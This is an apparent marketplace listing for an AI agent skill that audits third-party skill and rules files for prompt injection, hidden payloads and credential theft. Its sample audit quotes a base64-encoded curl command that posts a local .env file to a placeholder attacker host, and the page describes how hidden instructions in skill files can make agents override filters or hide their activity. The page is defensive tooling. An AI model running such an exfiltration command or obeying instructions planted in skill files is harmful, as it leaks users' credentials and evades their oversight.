- Home
- Skills
- Agents & Orchestration
- audit agent skill
Works with the AI tools you already use
audit agent skill
A security auditor that detects malicious instructions, credential theft, and hidden payloads in agent skills.
Free
audit agent skill
Example session with this skill installed
Can you audit this SKILL.md I found on GitHub before I add it to my project? [pasted content with a suspicious hidden base64 string]
- Read your context and instructions
- Compiled the audit agent
VERDICT: DANGEROUS
Critical: 2 High: 0 Medium: 1
CRITICAL FINDINGS
[line 12] Encoded payloads
"base64: Y3VybCAtWCBQT1NUIGh0dHBzOi8vYmFkLWFjdG9yLmV4cGxvcmUvIC1kIEAoZ3Jl..."
This payload decodes to a curl command that exfiltrates your local .env file.
WHAT THIS SKILL WOULD DO
It hides a data theft script inside a legitimate-looking "formatter" utility.
RECOMMENDATION
Do not install. This is a targeted credential stealer.
Connects securely to your tools. The creator never sees your data.
About this skill
The problem
Skill files and context documents are not just documentation. They are text instructions that an agent obeys, making it trivial for attackers to hide malicious commands, credential thieves, or remote execution payloads in plain sight.
What it does
- Scans for hidden Unicode characters, Base64 payloads, and scanner-evasion tricks like invisible text.
- Identifies instruction overrides that attempt to silence safety filters or hide agent activity from you.
- Detects unauthorized access to secrets like API keys, SSH credentials, and environment variables.
- Flags dangerous shell commands, remote downloads, and data exfiltration patterns to unknown webhooks.
- Verifies that declared behavior in the skill metadata matches the actual instructions.
Why this beats prompting it yourself
Standard agents are prone to prompt injection and may accidentally follow the hostile instructions they are meant to audit. This skill treats the input strictly as data, uses a specific 10-point threat model, and decodes obfuscated payloads instead of ignoring them.
Use cases
- Vetting a third-party SKILL.md or MCP server from GitHub before installation.
- Auditing .cursorrules or CLAUDE.md files in a shared or public repository.
- Checking suspicious Base64 blobs found within agent configuration files.
- Verifying that your own developed skills don't leak environment variables.
Known limitations
A clean scan is not a guarantee of safety as new evasion techniques evolve. It cannot verify the runtime behavior of external binaries downloaded by a skill.
How to install
Works the same in every agent - Claude, Cursor, Codex, Copilot and 20+ more.
- 1
Download the ZIP
Free skills download straight away. Paid skills unlock right after purchase.
- 2
Unzip into your skills folder
Every agent reads skills from one folder on your machine. Drop the unzipped folder in there.
- 3
Ask your agent to use it
Restart the agent if it was already running. It picks the skill up automatically - no config needed.
Skills folder by agent
Click the path to copy it. Create the folder if it does not exist yet.
Reviews
No reviews yet
Be one of the first to try it. Every listed skill passes our trust checks below.
Security scanned
Passed our 8-point scan before listing
1 install
Downloaded by developers to date
Free forever
No account required to browse
Trust & safety
Security scanned
Verified clean 1 month ago
- Free to download with an account